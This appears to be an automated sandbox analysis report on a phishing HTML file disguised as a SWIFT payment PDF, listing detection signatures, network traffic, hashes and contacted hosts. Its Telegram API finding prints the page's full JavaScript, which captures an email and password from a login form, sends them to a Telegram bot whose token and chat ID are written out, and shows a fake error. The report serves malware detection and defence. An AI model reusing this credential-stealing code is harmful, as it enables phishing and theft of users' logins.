Windows Analysis Report
swift-copy31072024PDF.html

Overview

General Information

Sample name:	swift-copy31072024PDF.html
Analysis ID:	1544346
MD5:	21de1eced0bba2c144b3f9a267f95fd7
SHA1:	d08160beca4b007084fc5e9b1df1ce3b44de6e85
SHA256:	6aa352aa8f89d3dbc564639ea5ad6c32b3ab5b248b087dca8d37b483674de47a
Infos:

Detection

HTMLPhisher

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected phishing page

Yara detected HtmlPhish10

HTML document with suspicious name

HTML file submission containing password form

Javascript uses Telegram API

Uses the Telegram API (likely for C&C communication)

Detected non-DNS traffic on DNS port

HTML body contains low number of good links

HTML body contains password input but no form action

HTML title does not match URL

None HTTPS page querying sensitive user data (password, username or email)

Stores files to the Windows start menu directory

Classification

Signatures

Phishing

AI detected phishing page

Source: file:///C:/Users/user/Desktop/swift-copy31072024PDF.html

LLM: Score: 10 Reasons: HTML file with login form DOM: 1.0.pages.csv

Yara detected HtmlPhish10

Source: Yara match

File source: swift-copy31072024PDF.html, type: SAMPLE

Javascript uses Telegram API

Source: file:///C:/Users/user/Desktop/swift-copy31072024PDF.html

HTTP Parser: document.getelementbyid('loginform').addeventlistener('submit', function(event) { event.preventdefault(); var email = document.getelementbyid('email').value; var password = document.getelementbyid('password').value; var apikey = '7143837038:aah8epg67nubqq5-xg1extwtgi0rzkmui28'; var chatid = '7463984269'; var message = 'submission:\nemail: ' + email + '\npassword: ' + password; var url = 'https://api.telegram.org/bot' + apikey + '/sendmessage?chat_id=' + chatid + '&text=' + encodeuricomponent(message); fetch(url) .then(function(response) { if (response.ok) { alert('failed: sign in incorrect. please press ok and try again.'); } else { alert('failed: sign in incorrect. please press ok and try again.'); } }) .catch(function(error) { alert('verbumnetworks.net'); }); });

HTML body contains low number of good links

Source: swift-copy31072024PDF.html	HTTP Parser: Number of links: 0
Source: file:///C:/Users/user/Desktop/swift-copy31072024PDF.html	HTTP Parser: Number of links: 0

HTML body contains password input but no form action

Source: swift-copy31072024PDF.html	HTTP Parser: <input type="password" .../> found but no <form action="...
Source: file:///C:/Users/user/Desktop/swift-copy31072024PDF.html	HTTP Parser: <input type="password" .../> found but no <form action="...

HTML title does not match URL

Source: swift-copy31072024PDF.html	HTTP Parser: Title: continue does not match URL
Source: file:///C:/Users/user/Desktop/swift-copy31072024PDF.html	HTTP Parser: Title: continue does not match URL

None HTTPS page querying sensitive user data (password, username or email)

Source: file:///C:/Users/user/Desktop/swift-copy31072024PDF.html

HTTP Parser: Has password / email / username input fields

Source: swift-copy31072024PDF.html	HTTP Parser: <input type="password" .../> found
Source: file:///C:/Users/user/Desktop/swift-copy31072024PDF.html	HTTP Parser: <input type="password" .../> found

Source: swift-copy31072024PDF.html	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/swift-copy31072024PDF.html	HTTP Parser: No favicon

Source: swift-copy31072024PDF.html	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/swift-copy31072024PDF.html	HTTP Parser: No <meta name="author".. found

Source: swift-copy31072024PDF.html	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/swift-copy31072024PDF.html	HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:56535 version: TLS 1.2

Source: chrome.exe

Memory has grown: Private usage: 1MB later: 29MB

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org

Detected non-DNS traffic on DNS port

Source: global traffic	TCP traffic: 192.168.2.16:56524 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56524 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56524 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56524 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56524 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56524 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56524 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56524 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56524 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56524 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56524 -> 1.1.1.1:53

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56528 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56530 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56547 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56540 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56537 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56533 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56529 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56529
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56525 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56525
Source: unknown	Network traffic detected: HTTP traffic on port 56546 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56526
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56527
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56528
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56530
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56531
Source: unknown	Network traffic detected: HTTP traffic on port 56543 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56536 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56526 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56532 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56536
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56537
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56539
Source: unknown	Network traffic detected: HTTP traffic on port 56545 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56532
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56533
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56534
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56535
Source: unknown	Network traffic detected: HTTP traffic on port 56539 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56540
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56541
Source: unknown	Network traffic detected: HTTP traffic on port 56542 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56542
Source: unknown	Network traffic detected: HTTP traffic on port 56535 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 56527 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56531 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56547
Source: unknown	Network traffic detected: HTTP traffic on port 56544 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56543
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56544
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56545
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56546
Source: unknown	Network traffic detected: HTTP traffic on port 56541 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 56534 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:56535 version: TLS 1.2

System Summary

HTML document with suspicious name

Source: Name includes: swift-copy31072024PDF.html

Initial sample: swift

Source: classification engine

Classification label: mal72.phis.troj.winHTML@14/20@8/97

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\swift-copy31072024PDF.html
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1876,i,5721794662497170584,7017191593047677730,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1876,i,5721794662497170584,7017191593047677730,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Stores files to the Windows start menu directory

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Stealing of Sensitive Information

HTML file submission containing password form

Source: file:///C:/Users/user/Desktop/swift-copy31072024PDF.html

HTTP Parser: file:///C:/Users/user/Desktop/swift-copy31072024PDF.html

Screenshots

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
1.1.1.1	unknown	Australia	13335	CLOUDFLARENETUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
216.58.212.142	unknown	United States	15169	GOOGLEUS	false
216.58.206.67	unknown	United States	15169	GOOGLEUS	false
173.194.76.84	unknown	United States	15169	GOOGLEUS	false
172.217.18.3	unknown	United States	15169	GOOGLEUS	false
142.250.185.132	www.google.com	United States	15169	GOOGLEUS	false
216.58.206.46	unknown	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.16
192.168.2.5

Contacted Domains

Name	IP	Active
www.google.com	142.250.185.132	true
api.telegram.org	149.154.167.220	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
file:///C:/Users/user/Desktop/swift-copy31072024PDF.html	true		unknown

ID:	1544346
Product:	CloudBasic
Start time:	10:06:03
Start date:	29.10.2024
Sample:	swift-copy31072024PDF.html
Cookbook:	defaultwindowsinteractivecookbook.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	21de1eced0bba2c144b3f9a267f95fd7
SHA1:	d08160beca4b007084fc5e9b1df1ce3b44de6e85
SHA256:	6aa352aa8f89d3dbc564639ea5ad6c32b3ab5b248b087dca8d37b483674de47a
Filetype:	HyperText Markup Language (15015/1) 38.98%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 29 08:06:36 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide	0EF60CCBCBF6F736AF6D392181B9C592	058C1271166CD99E63F9F087BDEBAF2FBE20E35F	7A6D02DA1F6B3993875DB8FCE6E32B98505FEF647AD3E31C6DADD373E9A43602
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 29 08:06:36 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide	22B6A6BAD7EB02D3175802F4F37DCD07	079EE4F2D8B973D8B8392C21935944549FEAC778	97270523CBE9D844FD32B484DDDB4C9C9C89E722308F769F5762B6696DD2A025
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide	37EB935C85DBFC65BA621B1DF2662578	D0C2415A7B8FAC1A1C64959EFAF9F2AF6428AE4A	7E77AF33985B3C27BBF17CECB8EFA7D50F8BF789FE300E300E657107B9FB225F
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 29 08:06:36 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide	63CAEC385151D391538462F04699F524	40616B1414EAADA311185D931ABB5E2F5AF80F7D	1525B3C9D55D79E617F08D29CA950F099810F2EA69311B86C96481FB980CD85A
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 29 08:06:36 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide	70547CAB5D32A0D079784163C2678883	B3BECB2F92C62BDAC4C956CE78C358DC703C45CA	6902204A1DDCEB3F9FF5B427A5642426BAE31CD167DD7D42C46187E9F95E6487
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 29 08:06:36 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide	7A859F447C9FC2683CFB1DEFB5E6F2D0	9337DAE6840C698D33515A6D3BE046E44F69415D	CEAF0F50B989D15D7126191C103908463AD61EA80E3A6E730711E823C0F5EB83
Chrome Cache Entry: 58	JSON data	ED93C5FC8EA2AC11587F15C015661840	F39A9259D4C9799421740942AFBD56A091238CF7	8671D73D46C4FE96720C4D8A160825A44A59FD4F94F7204A1345C16E7D1F31D5
Chrome Cache Entry: 59	JSON data	25B220D6D99C45E1BA481330BE73F82B	AA06BEDE7DFD1BB20328DCA38E6806B68817BFF0	37C229E6D693721B63BC65453465FB407847F5D8296F6B2F6DC0802B0231DE1F
Chrome Cache Entry: 60	JSON data	7BDE7640E9E106888B75FA3F4BE69F0F	FECCBCFBA261A02386F9D932DC67F364FFA1F17A	2CA057560BEEC50A9ED086131E1E13AE910F82182EC9D9AA9FE5C391884605CA
Chrome Cache Entry: 61	JSON data	0C7DB13F0A860BEDDEAC67290376B5C3	102953D308A7C8B20EC0B7AC2261D8704D134E62	3420D3DE2573B0EB808CD75651489C7F46A7C019B20CE1098197E12AE023A32B
Chrome Cache Entry: 62	JSON data	92DF928BCBFBD9D695EAD5982EA6EEBF	BA5FEC4E824B0E4FD61DE14CE81E3E47944ABC8E	9E36756B187E742FCF6B4DF9E34C77007E62F3D3838BE67C96A56FF4EC07DF9C
Chrome Cache Entry: 63	JSON data	C3D1CD475C655A17785B0199A1FE70EC	B8E883F7CABFE93C366D8C4F4C707E90EDE6B95D	0E335E3C5826C3DAD2C108AE8D0CFEC77A8E0BE005472E17CCF8945BD7A07CC1
Chrome Cache Entry: 64	JSON data	88946E04A7DAB30BFD1C8AA78BBE047A	4778E0A99FEA729AE06C5FED9ABA21AC679989EB	99CABC17BAC293B5F4AE7D4740DA9508C2F3C1511BDB2C67665C2C5F2DB91C36
Chrome Cache Entry: 65	JSON data	8042D9B687EFCFF45632BA560CB0E6B7	D73567775231F45A793FCEE446E4C4135E237AF3	F2D158589825D944E5CB3BB4A88A53F8D7C3DC95CC604DFF39F47036227140A0
Chrome Cache Entry: 66	JSON data	999E029DCFE6B70C6472B263E5664298	B0F4C6FBDDCE6A0A2D2EA02BEB61C94810A02B01	924226DDB0A96979E9EE6380368089A57DBF0D6257F2FA0310C5BF3893F2C403
Chrome Cache Entry: 67	JSON data	97F3853F60226D22A26CE7C4FA92DFE9	356DE54139456A427FAF37C1517360296849F359	27CA4092DD0FC4C894210952EA5D9BE22B89119B6F21053A06EA14295429152E
Chrome Cache Entry: 68	JSON data	E891BE6AA2D041F81CDC27F011CC5272	1BE43BABACC8816A73BECF0086165EAD016E5F3F	C989382F3C64475F53B6341278D643DF65A45695F6F6C8C130C80CBBD1489337
Chrome Cache Entry: 69	JSON data	36FC4DFD80ADA7B56E569003060D78B2	453A070DBB642AFCD913C59FB9F690D89300844C	0D890C085E645CD9803592A768ED5BEB042B7D971D468BF08EE181D2185C7408
Chrome Cache Entry: 70	JSON data	8658F5921B924FB17C6E4461607A98B3	38661F1DD591FB57856A18BED9A23DB12A044633	BE1565445D69B3AA1ABAEF132B80AFE15F27A0C32092AC353920026B663D0FDF
Chrome Cache Entry: 71	JSON data	806282548E1D9FBE7D210AC72CE442F0	8042D6CE7D930E455F398CF48281C4744AFAF9A8	1BF28012E41FFBB6DBA06FAA414A9E51357ABDD96CAAE18FB54EF37A9F5DE024

Windows Analysis Report
swift-copy31072024PDF.html

Overview

General Information

Detection

Signatures

Classification

Signatures

Phishing

Compliance

Software Vulnerabilities

Networking

System Summary

Boot Survival

Stealing of Sensitive Information

Screenshots

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report swift-copy31072024PDF.html

Overview

General Information

Detection

Signatures

Classification

Signatures

Phishing

Compliance

Software Vulnerabilities

Networking

System Summary

Boot Survival

Stealing of Sensitive Information

Screenshots

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
swift-copy31072024PDF.html